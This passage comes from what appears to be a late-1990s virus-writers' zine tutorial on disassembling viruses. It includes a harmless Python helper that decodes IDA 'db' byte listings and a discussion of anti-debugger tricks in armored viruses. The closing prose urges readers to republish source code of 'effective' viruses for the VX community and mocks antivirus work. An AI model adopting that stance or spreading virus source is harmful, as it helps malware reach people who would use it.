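seg000:0133 db 6Dh
seg000:0134 db 0
"""

# One byte per line: 'db 2Ah' (hex, trailing h) or 'db 0' (decimal).
DB_LINE = re.compile(r"\bdb\s+([0-9][0-9A-Fa-f]*)(h?)\s*$", re.IGNORECASE)


def decode_db_lines(listing):
    """Turn single-byte db lines into readable text.

    Printable ASCII bytes become characters; anything else is shown
    as an escaped \\xNN so terminators and control bytes stay visible.
    """
    out = []
    for line in listing.splitlines():
        code = line.split(";", 1)[0]      # drop any trailing comment
        match = DB_LINE.search(code)
        if not match:
            continue                      # not a single-byte db line
        digits, hex_suffix = match.groups()
        value = int(digits, 16 if hex_suffix else 10)
        if 0x20 <= value <= 0x7E:
            out.append(chr(value))
        else:
            out.append("\\x%02x" % value)
    return "".join(out)


if __name__ == "__main__":
    print(decode_db_lines(SAMPLE))        # prints *.com\x00
```

Lines that do not match the one-byte pattern are skipped rather than guessed at, so multi-value db lines or quoted strings would need extra handling.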
And yet another important fact to keep in mind when examining viruses is that many viruses quite literally do NOT want to be examined. That is to say, they have been programmed with anti-anti-virus, anti-heuristic, anti-debugger, and anti-disassembler routines which make examination an even more difficult process, and sometimes even a risky one. The same rule we learned as children when dealing with wild animals applies here: if you cannot identify an animal, don't get close enough to let it harm you. This is a pretty safe rule to live by, but I'm sure some of you won't live by it, as we didn't as children and don't now ;) But you should keep yourself on top of ideas and advances in armored programming. Most of the time armored programming is not harmful and just creates an immense amount of difficulty in examining the code. However, we have heard of and seen some pretty nasty tricks laid inside virii waiting for the anti-virus researcher. One example is hooking int 3 (the breakpoint interrupt, which is essential when examining programs in DEBUG) so that running a debugger on the virus can trigger anything, from simply displaying a witty message on the debug screen and exiting without allowing the code to be examined, all the way to wiping entire disks. Though it is fairly rare to come across a virus that will actually punish the reverse engineer, they do exist and we felt the necessity to inform you of their existence. Be smart, use your background knowledge of the virus you are examining, and we're sure that the beast won't bite back.

Hopefully, this has prepared you to begin doing quality disassemblies of virus code. You will learn A LOT about assembly language doing them, and you will be contributing to the VX community by making precise source code to popular and effective virii available again, for others to learn from and build upon.

So until next time, viewing audience: The computer is a wonderful microcosm in which man can play god.
Is the AV holding the hands of evolution back? Ask Darwin. - Horny Toad and Opic [Codebreakers '98]